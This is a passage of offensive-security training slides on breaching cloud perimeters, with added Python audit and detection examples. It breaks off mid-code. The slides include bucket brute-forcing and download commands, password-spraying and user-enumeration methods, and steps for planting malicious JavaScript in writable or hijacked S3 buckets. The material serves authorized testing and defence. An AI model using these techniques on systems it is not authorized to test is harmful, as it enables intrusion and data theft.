Breaching The Cloud Perimeter Slides

The document discusses penetration testing cloud environments. It begins with an overview of authorization requirements when testing cloud services and common authentication methods used, such as access keys, certificates, and tokens. It then covers reconnaissance techniques, including discovering cloud assets through DNS records and IP space analysis, as well as tools for reconnaissance like Recon-NG, Amass, Spiderfoot and Gobuster. The document will continue discussing exploiting misconfigurations, gaining footholds, and post-compromise activities in cloud environments.

Breaching the Cloud Perimeter
Brought to you by…

© Offensive Tradecraft by BHIS
@BHInfoSecurity
https://www.blackhillsinfosec.com
Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon
• Pillaging Cloud Assets
• Cloud Infrastructure Attacks
• Weaponizing the Cloud for Red Team Operations

Cloud vs. On-Prem
• What is different about penetration testing "the cloud"?
• Traditional attacks, different angle
• Post-compromise results in new challenges
• More room for misconfiguration
• Higher risk to orgs as services used by employees are now public facing

Author/Instructor
• Beau Bullock (@dafthack)
• Pentester / Red Team at Black Hills Information Security
• Certs: OSCP, OSWP, GXPN, GPEN, GWAPT, GCIH, GCIA, GCFA, GSEC
• Speaker: WWHF, DerbyCon, Black Hat Arsenal, BSides, Hack Miami, RVASec
• Tool Developer: MailSniper, PowerMeta, DomainPasswordSpray, MSOLSpray, HostRecon, Check-LocalAdminHash

Sources & Thanks!
• Huge thanks to all the cloud pentesting blog/book authors & open source developers!
• Sean Metcalf (@PyroTek3) & Trimarc - https://adsecurity.org/
• Karl Fosaaen (@kfosaaen) & NETSPI - https://blog.netspi.com/
• Ryan Hausknecht (@haus3c) & SpecterOps - https://posts.specterops.io/
• Dirk-jan Mollema (@_dirkjan) - https://dirkjanm.io/
• Mike Felch (@ustayready) - https://github.com/ustayready
• Matt Burrough (@mattburrough) - https://nostarch.com/azure
• Rhino Security Labs (@RhinoSecurity) - https://rhinosecuritylabs.com/blog/
• Zachary Rice (@zricethezav) - https://github.com/zricethezav
• Adam Chester (@xpn) - https://blog.xpnsec.com/
• NCC Group (@NCCGroupInfoSec) - https://github.com/nccgroup
• Chris Moberly (@init_string) & Gitlab - https://gitlab.com/gitlab-com/gl-security
• Lee Kagan (@invokethreatguy) & Lares - https://www.lares.com/resources/blog/
• Oddvar Moe (@Oddvarmoe) & TrustedSec - https://www.trustedsec.com/blog/
• Steve Borosh (@424f424f) - https://medium.com/@rvrsh3ll
• Full list of blog/tool references at the end of the slides!
AWS v. Azure v. GCP
• Different names for similar services

Azure v. Microsoft 365
GCP v. G-Suite
• Google Cloud Platform != G-Suite
• Azure != Microsoft 365
• G-Suite and Microsoft 365 are productivity suites that can be utilized as standalone services
• GCP and Azure are infrastructure and so much more
• They can live in harmony together though

Cloud Pentest Authorization

Cloud Pentest Authorization
• What are you allowed to test?
• Most cloud providers allow for the testing of a company's cloud assets without filling out a form anymore
• Check each cloud provider’s rules prior to each engagement
• Typically refrain from:
  • DoS testing
  • Intense fuzzing
  • Phishing the cloud provider’s employees
  • Testing other companies’ assets
  • Etc.
• Most providers want you to report any vulnerabilities in their platforms
Pentesting Azure
• https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement

Pentesting AWS
• https://aws.amazon.com/security/penetration-testing/

Pentesting GCP
• https://support.google.com/cloud/answer/6262505?hl=en

Authentication Methods

Cloud Authentication Methods
• More ways to authenticate to cloud providers than just username and password
• APIs, certificates, and more
• Multi-factor settings might differ for things like service accounts or those that authenticate with certs
• Sometimes keys get posted publicly with code to repos
• Finding authentication points is a key first step

Cloud Authentication Methods: Azure
• Forms of authentication to consider…
  • Password Hash Synchronization
  • Pass Through Authentication
  • Active Directory Federation Services (ADFS)
  • Certificate-based auth
  • Conditional access policies
  • Long-term access tokens
  • Legacy authentication portals

Azure: Password Hash Synchronization
• Azure AD Connect
• On-prem service synchronizes hashed user credentials to Azure
• User can authenticate directly to Azure services like O365 with their internal domain credential

Azure: Pass-Through Authentication
• Credentials stored only on-prem
• On-prem agent validates authentication requests to Azure AD
• Allows SSO to other Azure apps without creds stored in cloud

Azure: Active Directory Federation Services
• Credentials stored only on-prem
• Federated trust is set up between Azure and on-prem AD to validate auth requests to the cloud
• For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints

Azure: Certificate-based Authentication
• Client certs for authentication to API
• Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
• Service Principals can be set up with certs to auth

Azure: Access Tokens
• Authentication to Azure with OAuth tokens
• Desktop CLI tools that can be used to auth store access tokens on disk
• These tokens can be reused on other MS endpoints
• We have a lab on this later!

Cloud Authentication Methods: AWS
• Programmatic access - Access + Secret Key
• Management Console Access

AWS: Programmatic Access
• Secret Access Key and Access Key ID for authenticating via scripts and CLI

AWS: Management Console
• Web Portal Access to AWS

Cloud Authentication Methods: Google
• Web Access
• API – OAuth 2.0 protocol
• Access tokens – short-lived access tokens for service accounts
• JSON Key Files – long-lived key-pairs
• Credentials can be federated

Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Cloud Asset Discovery
• User Enumeration
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Post-Compromise Recon

Reconnaissance

Recon: Cloud Asset Discovery
• First step should be to determine what services are in use
• More and more orgs are moving assets to the cloud one at a time
• Many have limited deployment to cloud providers, but some have fully embraced the cloud and are using it for AD, production assets, security products, and more
• Determine things like AD connectivity, mail gateways, web apps, file storage, etc.

Recon: Cloud Asset Discovery
• Traditional host discovery still applies
• After host discovery resolve all names, then perform whois lookups to determine where they are hosted
• Microsoft, Amazon, Google IP space usually indicates cloud service usage
• More later on getting netblock information for each cloud service
• MX records can show cloud-hosted mail providers

Recon: Cloud Asset Discovery
• Recon Tools
  • Recon-NG: https://github.com/lanmaster53/recon-ng
  • OWASP Amass: https://github.com/OWASP/Amass
  • Spiderfoot: https://www.spiderfoot.net/
  • Gobuster: https://github.com/OJ/gobuster
  • Sublist3r: https://github.com/aboul3la/Sublist3r

Recon: Cloud Asset Discovery
• Use search engines
• Bing and Google are good places to start
  site:targetdomain.com -site:www.targetdomain.com
• Baidu
• DuckDuckGo

Recon: Cloud Asset Discovery
• Certificate Transparency
  • Monitors and logs digital certs
  • Creates a public, searchable log
  • Can help discover additional subdomains
  • More importantly… you can potentially find more Top Level Domains (TLDs)!
  • Single cert can be scoped for multiple domains
Recon: Cloud Asset Discovery
• Shodan.io and Censys.io
  • Internet-wide portscans
  • Certificate searches
• Shodan query examples:
  • org:"Target Name"
  • net:"CIDR Range"
  • port:"443"

Recon: Cloud Asset Discovery
• DNS Brute Forcing
  • Performs lookups on a list of potential subdomains
  • Make sure to use quality lists
  • SecLists: https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS
  • If you find commonalities between subdomains try iterating names

Recon: Cloud Asset Discovery
• MX Records can help us identify cloud services in use
  • O365 = target-domain.mail.protection.outlook.com
  • G-Suite = google.com | googlemail.com
  • Proofpoint = pphosted.com

Recon: Cloud Asset Discovery
• Other Services
  • HackerTarget: https://hackertarget.com/
  • ThreatCrowd: https://www.threatcrowd.org/
  • DNSDumpster: https://dnsdumpster.com/
• ARIN Searches
  • https://whois.arin.net/ui/
  • Search bar accepts wild cards "*"
  • Great for finding other netblocks owned by the same organization

Recon: Cloud Asset Discovery
• Now resolve all the domains you obtained and compare to cloud service netblock ranges
• Azure Netblocks
  • Public: https://www.microsoft.com/en-us/download/details.aspx?id=56519
  • US Gov: http://www.microsoft.com/en-us/download/details.aspx?id=57063
  • Germany: http://www.microsoft.com/en-us/download/details.aspx?id=57064
  • China: http://www.microsoft.com/en-us/download/details.aspx?id=57062
• AWS Netblocks
  • https://ip-ranges.amazonaws.com/ip-ranges.json
• GCP Netblocks
  • Google made it complicated so there’s a script on the next page to get the current IP netblocks.

Recon: Cloud Asset Discovery
#!/bin/sh
# Walk the SPF-style TXT record Google publishes for its cloud netblocks:
# follow every "include:" exactly once and print each "ip4:" range found.
# (Google has since also published the same ranges as JSON at
# https://www.gstatic.com/ipranges/cloud.json; the TXT walk is what the slide showed.)

set -- $(dig -t txt +short _cloud-netblocks.googleusercontent.com +trace)

included="" ip4=""
while [ $# -gt 0 ]; do
  # each token looks like "include:<name>" or "ip4:<cidr>"; split on the first ":"
  k="${1%%:*}" v="${1#*:}"
  case "$k" in
    include)
      # only include once
      if [ "${included% $v *}" = "${included}" ]; then
        # append the included record's tokens to the positional parameters
        set -- "$@" $(dig -t txt +short "$v")
        included=" $v $included"
      fi
      ;;
    ip4) ip4="$v $ip4" ;;
  esac
  shift
done

for i in $ip4; do
  echo "$i"
done

Recon: Cloud Asset Discovery
• Here is a script to compare a list of IP addresses to Azure, AWS, GCP ranges, and more:
  • https://github.com/oldrho/ip2provider
• Create a list of IP addresses you want to check, one per line
  cat iplist.txt | python ip2provider.py
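As an added example (not code from the slides or from ip2provider), here is a small Python classifier that performs the netblock comparison the previous two slides describe: it loads an AWS ip-ranges.json document and an Azure Service Tags document, then tags each resolved hostname with the provider, region and service of the longest matching prefix. Both documents below are constructed samples in the layout of the real downloads and use documentation address ranges, not real cloud netblocks; on an engagement you would load the published files from the URLs on the previous slide, and the hostnames in the usage block are fictitious.

```python
import ipaddress
import json

# Constructed sample in the layout of https://ip-ranges.amazonaws.com/ip-ranges.json.
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges, not AWS space.
AWS_RANGES_JSON = """{
  "syncToken": "0", "createDate": "2020-01-01-00-00-00",
  "prefixes": [
    {"ip_prefix": "203.0.113.0/24",  "region": "us-east-1", "service": "AMAZON"},
    {"ip_prefix": "203.0.113.0/25",  "region": "us-east-1", "service": "EC2"},
    {"ip_prefix": "198.51.100.0/24", "region": "eu-west-1", "service": "S3"}
  ]
}"""

# Constructed sample in the layout of the Azure Service Tags download
# (ServiceTags_Public_*.json); 192.0.2.0/24 is a documentation range.
AZURE_TAGS_JSON = """{
  "cloud": "Public",
  "values": [
    {"name": "AzureCloud.eastus",
     "properties": {"region": "eastus", "addressPrefixes": ["192.0.2.0/24"]}},
    {"name": "Storage.eastus",
     "properties": {"region": "eastus", "addressPrefixes": ["192.0.2.128/25"]}}
  ]
}"""


def load_aws_prefixes(doc):
    """Return (network, provider, region, service) tuples from an ip-ranges.json text."""
    out = []
    for p in json.loads(doc).get("prefixes", []):
        out.append((ipaddress.ip_network(p["ip_prefix"]), "AWS", p["region"], p["service"]))
    return out


def load_azure_prefixes(doc):
    """Return (network, provider, region, service) tuples from a Service Tags JSON text."""
    out = []
    for tag in json.loads(doc).get("values", []):
        props = tag["properties"]
        for prefix in props.get("addressPrefixes", []):
            out.append((ipaddress.ip_network(prefix), "Azure", props.get("region", ""), tag["name"]))
    return out


def classify_ip(ip, prefixes):
    """Longest-prefix match of ip against the loaded ranges; None if no provider owns it."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, provider, region, service in prefixes:
        # skip v4/v6 mismatches explicitly; "addr in net" would raise otherwise
        if addr.version == net.version and addr in net:
            if best is None or net.prefixlen > best[0].prefixlen:
                best = (net, provider, region, service)
    if best is None:
        return None
    return {"prefix": str(best[0]), "provider": best[1], "region": best[2], "service": best[3]}


def classify_hosts(resolved, prefixes):
    """resolved maps hostname -> IP string (the output of your DNS resolution step)."""
    return {host: classify_ip(ip, prefixes) for host, ip in resolved.items()}


if __name__ == "__main__":
    ranges = load_aws_prefixes(AWS_RANGES_JSON) + load_azure_prefixes(AZURE_TAGS_JSON)
    # Constructed resolution results for a fictitious target.
    sample = {"www.example.com": "203.0.113.10", "files.example.com": "192.0.2.200",
              "vpn.example.com": "198.18.0.1"}
    for host, hit in classify_hosts(sample, ranges).items():
        print(host, "->", hit or "not in a known cloud range")
```

The longest-prefix rule matters for AWS in particular: the published file lists a broad AMAZON prefix and the narrower EC2 or S3 prefixes inside it, and the narrower one is the useful answer.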

Recon: Cloud Asset Discovery
• O365 Usage
  • https://login.microsoftonline.com/getuserrealm.srf?login=username@acmecomputercompany.com&xml=1
  • https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/test@targetdomain.com?Protocol=Autodiscoverv1

Recon: Cloud Asset Discovery
• G-Suite Usage
  • Try authenticating with a valid company email address at Gmail

Recon: Cloud Asset Discovery
• AWS Usage
  • Some web applications may pull content directly from S3 buckets
  • Look to see where web resources are being loaded from to determine if S3 buckets are being utilized
  • Burp Suite
    • Navigate application like you normally would and then check for any requests to:
      • https://[bucketname].s3.amazonaws.com
      • https://s3-[region].amazonaws.com/[Org Name]

Recon: Cloud Asset Discovery
• Box.com Usage
  • Look for any login portals
    • https://companyname.account.box.com
  • Can find cached Box account data too

Recon: Employees
• Need to build a user list
• LinkedIn is your friend
• Useful for both password attacks and phishing
• Determine username schema via public file metadata (PDF, DOCX, XLSX, etc.)
  • PowerMeta: https://github.com/dafthack/PowerMeta
  • FOCA: https://github.com/ElevenPaths/FOCA

Recon: User Enumeration
• User enumeration on Azure can be performed at https://login.Microsoft.com/common/oauth2/token
• This endpoint tells you if a user exists or not
• Detect invalid users while password spraying with:
  • https://github.com/dafthack/MSOLSpray (Lab on this later!)
• For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)

Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Open S3 Buckets
• Public Azure Storage
• Public Google Buckets
• Pacu
• LAB: S3 Bucket Pillaging
• S3 Code Injection & Hijacking
• Gaining a Foothold
• Post-Compromise Recon

Exploiting Misconfigured Cloud Assets

S3 Buckets
• Amazon Simple Storage Service (S3)
• Storage service that is “secure by default”
• Configuration issues tend to un-secure buckets by making them publicly accessible
• Nslookup can help reveal region
• S3 URL Format:
  • https://[bucketname].s3.amazonaws.com
  • https://s3-[region].amazonaws.com/[Org Name]
# aws s3 ls s3://<bucketname>/ --region <region>

EBS Volumes
• Elastic Block Store (EBS)
• AWS virtual hard disks
• Can have similar issues to S3 being publicly available
• Dufflebag from Bishop Fox
  • https://github.com/bishopfox/dufflebag
• Difficult to target specific org but can find widespread leaks

Data in Public Azure Blobs
• Microsoft Azure Storage is like Amazon S3
• Blob storage is for unstructured data
• Containers and blobs can be publicly accessible via access policies
• Predictable URLs at core.windows.net
  • storage-account-name.blob.core.windows.net
  • storage-account-name.file.core.windows.net
  • storage-account-name.table.core.windows.net
  • storage-account-name.queue.core.windows.net

Data in Public Azure Blobs
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
• The “Container” access policy allows for listing containers and blobs
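The two access policies differ in what an anonymous client gets back, so they can be told apart from two unauthenticated requests: a container listing (`?restype=container&comp=list`) and a GET of one blob whose name you already know. The following is an added Python example, not code from the slides or from MicroBurst, that takes the HTTP status codes and listing body those two probes returned and classifies the container, which is the check a storage owner would run across their own accounts to catch a container left at "Container" level. The listing XML below is a constructed sample in the layout of Azure's List Blobs response; the account name `contosodata` and container `backups` are fictitious.

```python
import xml.etree.ElementTree as ET

# Constructed sample of an Azure "List Blobs" response (EnumerationResults XML);
# account "contosodata" and container "backups" are fictitious.
SAMPLE_LISTING = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://contosodata.blob.core.windows.net/" ContainerName="backups">
  <Blobs>
    <Blob><Name>db-2020-01-01.bak</Name><Properties><Content-Length>1048576</Content-Length></Properties></Blob>
    <Blob><Name>keys/service-principal.pfx</Name><Properties><Content-Length>2048</Content-Length></Properties></Blob>
  </Blobs>
  <NextMarker />
</EnumerationResults>"""


def storage_urls(account):
    """The four predictable endpoints an Azure storage account exposes."""
    return {svc: f"https://{account}.{svc}.core.windows.net" for svc in ("blob", "file", "table", "queue")}


def list_url(account, container):
    """URL of the anonymous container-listing probe."""
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def parse_listing(body):
    """Blob names from a List Blobs response, or [] if the body is not a listing."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return []
    if root.tag != "EnumerationResults":
        return []
    return [name.text for name in root.iter("Name") if name.text]


def classify_container(list_status, list_body, blob_status):
    """
    list_status/list_body: result of the anonymous listing probe.
    blob_status: result of an anonymous GET of one known blob name (from a web page,
    a leaked URL, ...); pass None if you have no blob name to try.
    Returns (access_level, blob_names). Only a 200 listing proves "Container" level;
    a 200 on a single blob without a listing is "Blob" level; anything else is treated
    as private (no status code other than 200 is relied on).
    """
    if list_status == 200 and "<EnumerationResults" in list_body:
        return "Container", parse_listing(list_body)
    if blob_status == 200:
        return "Blob", []
    return "Private", []


if __name__ == "__main__":
    print(storage_urls("contosodata"))
    print(list_url("contosodata", "backups"))
    print(classify_container(200, SAMPLE_LISTING, None))
```

Note that a "Blob"-level container still leaks anything whose name can be guessed or found elsewhere, which is why the listing probe alone is not the whole check.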

Data in Public Azure Blobs
• MicroBurst
  • https://github.com/NetSPI/MicroBurst
• Invoke-EnumerateAzureBlobs
  • Brute forces storage account names, containers, and files
  • Uses permutations to discover storage accounts
PS > Invoke-EnumerateAzureBlobs -Base <base name>

Pacu
• An AWS exploitation framework from Rhino Security Labs
  • https://github.com/RhinoSecurityLabs/pacu
• Module examples:
  • S3 bucket discovery
  • EC2 enumeration
  • IAM privilege escalation
  • Persistence modules
  • Exploitation modules
  • And more…

Data in Public Google Storage Buckets
• Google Cloud Platform also has a storage service called “Buckets”
• cloud_enum from Chris Moberly (@initstring)
  • https://github.com/initstring/cloud_enum
• Awesome tool for scanning all three cloud services for buckets and more
• Enumerates:
  • GCP open and protected buckets as well as Google App Engine sites
  • Azure storage accounts, blob containers, hosted DBs, VMs, and WebApps
  • AWS open and protected buckets

LAB
S3 Bucket Pillaging

LAB: S3 Bucket Pillaging
• GOAL: Locate Amazon S3 buckets and search them for interesting data
• In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list out the contents of it and download the files hosted there.

LAB: S3 Bucket Pillaging
• For these first 2 labs you will be using the Kali VM!
• In this lab you will be using cloud_enum to locate and search S3 buckets
• Run the below commands to install cloud_enum
~$ sudo apt-get install python3-pip
~$ git clone https://github.com/initstring/cloud_enum.git
~$ cd cloud_enum
~$ sudo pip3 install -r ./requirements.txt

LAB: S3 Bucket Pillaging
• Set up your AWS Access keys
~$ sudo aws configure
• Enter your “Access Key ID” and then “Secret Access Key”. These were created during the “Prerequisite Setup”.

LAB: S3 Bucket Pillaging
• Start cloud_enum
~$ python3 cloud_enum.py -k glitchcloud
• cloud_enum will begin brute forcing bucket names across all three services

LAB: S3 Bucket Pillaging
• Use the AWS CLI to list out files in the S3 bucket
~$ sudo aws s3 ls s3://glitchcloud
• Download the files in the bucket
~$ sudo aws s3 sync s3://glitchcloud s3-files-dir

S3 Code Injection
• Backdoor JavaScript in S3 buckets used by webapps
• In March 2018 a crypto-miner malware was found to be loading on MSN’s homepage
• This was due to AOL’s advertising platform having a writeable S3 bucket, which was being served by MSN

S3 Code Injection
• If a webapp is loading content from an S3 bucket made publicly writeable, attackers can upload malicious JS to get executed by visitors
• Can perform XSS-type attacks against webapp visitors
• Hook browser with BeEF

Domain Hijacking
• Hijack S3 domain by finding references in a webapp to S3 buckets that don’t exist anymore
• Or… subdomains that were linked to an S3 bucket with CNAMEs that still exist
• When assessing webapps look for 404s to *.s3.amazonaws.com

Domain Hijacking
• When brute forcing subdomains for an org look for 404s with ‘NoSuchBucket’ error
• Go create the S3 bucket with the same name and region
• Load malicious content to the new S3 bucket that will be executed when visitors hit the site
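Both S3 URL forms on the earlier "AWS Usage" slide and the dangling-bucket check on this slide come down to the same parsing step: pull every S3 reference out of a page, recover the bucket name (and region, where present), and look at what S3 says when that bucket is requested. The following is an added Python example, not code from the slides, that does this over a constructed HTML snippet and constructed S3 responses; `audit_page` takes a `fetch` callable so it runs offline here, and every hostname and bucket name is fictitious. For an application owner the same routine finds references to buckets the organization no longer holds, which is the fix-side of this slide: remove the reference or re-create the bucket before anyone else registers the name.

```python
import re
from urllib.parse import urlparse

# Virtual-hosted style: https://[bucket].s3.amazonaws.com or https://[bucket].s3-[region].amazonaws.com
VIRTUAL_HOST = re.compile(r"^(?P<bucket>[a-z0-9.\-]{3,63})\.s3(?:[.-](?P<region>[a-z0-9-]+))?\.amazonaws\.com$")
# Path style: https://s3-[region].amazonaws.com/[bucket]/... or https://s3.amazonaws.com/[bucket]/...
PATH_STYLE = re.compile(r"^s3(?:[.-](?P<region>[a-z0-9-]+))?\.amazonaws\.com$")
ATTR_URL = re.compile(r"""(?:src|href)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)

# Constructed page for a fictitious site; none of these buckets exist.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="https://example-assets.s3.amazonaws.com/css/site.css">
<script src="https://s3-us-west-2.amazonaws.com/example-legacy-js/app.js"></script>
<script src="https://cdn.example.com/vendor.js"></script>
</head><body><img src="/static/logo.png"></body></html>"""

# Constructed stand-in for HTTP fetches: bucket name -> (status, body).
# The second body is in the layout of S3's error document for a missing bucket.
SAMPLE_RESPONSES = {
    "example-assets": (200, "/* css */"),
    "example-legacy-js": (404, "<?xml version=\"1.0\" encoding=\"UTF-8\"?><Error><Code>NoSuchBucket</Code>"
                               "<Message>The specified bucket does not exist</Message>"
                               "<BucketName>example-legacy-js</BucketName></Error>"),
}


def s3_reference(url):
    """(bucket, region) if url points at S3 in either form, else None."""
    u = urlparse(url)
    host = (u.hostname or "").lower()
    m = VIRTUAL_HOST.match(host)
    if m:
        return m.group("bucket"), m.group("region")
    m = PATH_STYLE.match(host)
    if m:
        first = u.path.lstrip("/").split("/", 1)[0]   # first path segment is the bucket
        if first:
            return first, m.group("region")
    return None


def extract_s3_references(html):
    """Every S3 bucket referenced from src/href attributes, de-duplicated, in page order."""
    seen, refs = set(), []
    for url in ATTR_URL.findall(html):
        ref = s3_reference(url)
        if ref and ref[0] not in seen:
            seen.add(ref[0])
            refs.append(ref)
    return refs


def is_no_such_bucket(status, body):
    """S3 answers a request for a non-existent bucket with 404 and a NoSuchBucket error document."""
    return status == 404 and "<Code>NoSuchBucket</Code>" in body


def audit_page(html, fetch):
    """
    fetch(bucket) -> (status, body). Returns the referenced buckets and the subset that
    answer NoSuchBucket: those are the dangling references this slide is about.
    """
    referenced = extract_s3_references(html)
    dangling = [b for b, _region in referenced if is_no_such_bucket(*fetch(b))]
    return {"referenced": referenced, "dangling": dangling}


if __name__ == "__main__":
    print(audit_page(SAMPLE_HTML, lambda b: SAMPLE_RESPONSES.get(b, (200, ""))))
```

The CNAME case on the previous slide is the same check one DNS hop earlier: resolve the subdomain, and if the CNAME target is an S3 hostname, feed that hostname through `s3_reference` as well.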

Roadmap
• Breaching the Cloud Perimeter
• Cloud Pentest Authorization
• Cloud Authentication Methods
• Reconnaissance
• Exploiting Misconfigured Cloud Assets
• Gaining a Foothold
• Key Disclosure in Public Repositories
• LAB: Pillage Git Repos for Keys
• Password Attacks
• LAB: Password Spraying
• Web Server Exploitation
• AWS Instance Metadata URL
• Phishing
• Steal Access Tokens
• LAB: Authenticate to Azure with Stolen Access Tokens
• Post-Compromise Recon

Gaining A Foothold

Key Disclosure in Public Repositories
• Very often keys can get disclosed to public code repositories such as GitHub, Bitbucket, or GitLab
• Scavenge repos for keys
• Find secrets in real time: shhgit.darkport.co.uk
  • https://github.com/eth0izzle/shhgit

Key Disclosure in Public Repositories
• Some tools for searching Git repos
• Search through not only current code but also commit history
  • GitLeaks: https://github.com/zricethezav/gitleaks
  • Gitrob: https://github.com/michenriksen/gitrob
  • Truffle Hog: https://github.com/dxa4481/truffleHog
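As an added example, not code from the slides or from any of the tools listed above, here is the core of what these scanners do, reduced to Python: walk each commit's diff, look only at added lines, and flag lines that match a known key format (an AWS access key ID is `AKIA` or `ASIA` plus 16 upper-case alphanumerics; a Google API key is `AIza` plus 35 characters) or that assign a long, high-entropy value to a name containing `secret`, `token`, `password` or `api_key`. The commit history below is a constructed sample with fictitious commit ids; the AWS key pair in it is the one Amazon's own documentation uses, not a live credential. Because the scan is over history rather than the working tree, the key is still reported after the second commit removes it, which is the point the previous slide makes. The same function run as a pre-commit or CI check is how a team stops keys from reaching a public repo in the first place.

```python
import math
import re
from collections import Counter

# Known key formats.
KEY_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "google_api_key": re.compile(r"\bAIza[0-9A-Za-z_\-]{35}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH |)PRIVATE KEY-----"),
}
# Generic "name = value" assignments whose name suggests a credential.
ASSIGNMENT = re.compile(
    r"""(?i)\b(\w*(?:secret|token|passw(?:or)?d|api_?key)\w*)\s*[:=]\s*["']?([A-Za-z0-9/+=_\-]{20,})["']?""")
ENTROPY_THRESHOLD = 3.5   # bits per character: random base64 sits well above, placeholders below
MIN_ENTROPY_LEN = 32      # entropy of short strings is too noisy to act on


def shannon_entropy(s):
    """Bits per character of s."""
    counts = Counter(s)
    return -sum((n / len(s)) * math.log2(n / len(s)) for n in counts.values())


def scan_line(line):
    """Return a list of (kind, match) findings for one line of text."""
    findings = []
    for kind, pat in KEY_PATTERNS.items():
        for m in pat.finditer(line):
            findings.append((kind, m.group(0)))
    for name, value in ASSIGNMENT.findall(line):
        if len(value) >= MIN_ENTROPY_LEN and shannon_entropy(value) >= ENTROPY_THRESHOLD:
            findings.append(("high_entropy_" + name.lower(), value))
    return findings


def added_lines(diff):
    """Yield (line number within the diff, text) for added lines, skipping '+++' file headers."""
    for n, raw in enumerate(diff.splitlines(), 1):
        if raw.startswith("+") and not raw.startswith("+++"):
            yield n, raw[1:]


def scan_history(commits):
    """
    commits: iterable of (commit_id, unified_diff_text), oldest first, as `git log -p --reverse`
    would give you. A key that a later commit deleted is still reported, because the commit
    that added it is still in history.
    """
    findings = []
    for commit_id, diff in commits:
        for n, text in added_lines(diff):
            for kind, match in scan_line(text):
                findings.append({"commit": commit_id, "diff_line": n, "kind": kind, "match": match})
    return findings


# Constructed history with fictitious commit ids. The AWS pair is Amazon's documentation
# example (AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY), not a live credential.
SAMPLE_COMMITS = [
    ("a1b2c3d", "diff --git a/config.py b/config.py\n--- a/config.py\n+++ b/config.py\n"
                "@@ -0,0 +1,3 @@\n"
                "+AWS_ACCESS_KEY_ID = \"AKIAIOSFODNN7EXAMPLE\"\n"
                "+AWS_SECRET_ACCESS_KEY = \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"\n"
                "+DB_PASSWORD = \"REPLACE_ME_REPLACE_ME_REPLACE_ME\"\n"),
    ("e4f5a6b", "diff --git a/config.py b/config.py\n--- a/config.py\n+++ b/config.py\n"
                "@@ -1,3 +1,3 @@\n"
                "-AWS_ACCESS_KEY_ID = \"AKIAIOSFODNN7EXAMPLE\"\n"
                "-AWS_SECRET_ACCESS_KEY = \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\"\n"
                "+AWS_ACCESS_KEY_ID = os.environ[\"AWS_ACCESS_KEY_ID\"]\n"
                "+AWS_SECRET_ACCESS_KEY = os.environ[\"AWS_SECRET_ACCESS_KEY\"]\n"
                " DB_PASSWORD = \"REPLACE_ME_REPLACE_ME_REPLACE_ME\"\n"),
]

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_COMMITS):
        print(finding)
```

The placeholder `REPLACE_ME_...` value is assigned to a password variable but is not reported, because its entropy is far below that of a real 40-character secret; that is the trade-off the entropy rule buys, fewer false positives at the cost of missing short or low-entropy secrets, which is why the fixed-format patterns run alongside it.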

LAB
Pillage Git Repos for Keys

LAB: Git Secrets
• GOAL: Identify a target code repository and then search through all commit history to discover secrets that have been mistakenly posted.
• Oftentimes, developers post access keys, or various other forms of credentials, to code repositories by accident. Even if they remove the keys they may still be discoverable by searching through previous commit history.

LAB: Git Secrets
• GitLeaks – Tool for searching GitHub or GitLab repos
• Can search single repos or search an entire organization or user
• Written in Go, binary releases available
• We are going to use the Docker image

LAB: Git Secrets
• Pull GitLeaks with Docker
~$ sudo docker pull zricethezav/gitleaks
• Print the help menu
~$ sudo docker run --rm --name=gitleaks zricethezav/gitleaks --help

LAB: Git Secrets
• Use GitLeaks to search for secrets
~# sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git

LAB: Git Secrets
• Use a web browser to view the commit
  • https://github.com/[git account]/[repo name]/commit/[commit ID]

Password Attacks
• Password Spraying
  • Trying one password for every user at an org to avoid account lockouts (Spring2020)
  • Most systems have some sort of lockout policy
  • Example:
    • 5 attempts in 30 mins = lockout
    • If we attempt to auth as each individual username one time every 30 mins we lock out nobody
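The lockout arithmetic on this slide is exactly why a per-account failed-login threshold never sees a spray: each account fails once per window, below any lockout count. The signal is on the other axis: one source producing a single failure against many different accounts. The following is an added Python example, not code from the slides, that runs that rule over a constructed batch of sign-in records (JSON lines carrying the Azure AD result codes a tool like MSOLSpray keys on: 50126 invalid password, 50053 locked, 50057 disabled, 50055 expired, 50076 password accepted but MFA required, 0 success) and also reports which accounts the source got the password right for. Account names and addresses are fictitious.

```python
import json
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Azure AD sign-in result codes (the same outcomes MSOLSpray reports per user).
FAILURE_CODES = {"50126": "invalid password", "50053": "account locked",
                 "50057": "account disabled", "50055": "password expired"}
PASSWORD_ACCEPTED = {"0": "sign-in succeeded", "50076": "password valid, MFA required"}

# Constructed sign-in records: one spray source (203.0.113.5) trying eight accounts once each,
# and one user (j.doe) mistyping a password three times from 198.51.100.7, then succeeding.
SAMPLE_LOG = [
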